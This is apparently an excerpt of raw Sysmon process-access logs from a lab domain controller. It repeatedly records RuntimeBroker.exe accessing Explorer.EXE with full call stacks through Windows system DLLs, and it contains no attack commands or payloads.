10341000x800000000000000013093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.St